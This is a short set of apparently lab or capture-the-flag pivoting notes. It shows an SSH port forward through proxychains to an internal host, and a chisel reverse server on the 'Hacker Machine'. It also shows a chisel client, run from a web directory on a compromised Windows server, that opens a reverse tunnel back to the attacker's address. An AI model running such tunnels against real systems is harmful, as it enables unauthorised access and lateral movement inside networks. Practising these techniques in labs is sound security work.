==============================================================================
[+] SSH
==============================================================================
# Just in Hacker Machine

proxychains ssh -L 33060:127.0.0.1:33060 margaret@172.16.1.10

==============================================================================
[+] Hacker Machine
==============================================================================
# Terminal #1
./chisel server --reverse --port 9002

==============================================================================
[+] Windows Server Machine 
==============================================================================

C:\xampp\htdocs\user\images>chisel.exe client 10.10.14.10:9002 R:5000:127.0.0.1:4444
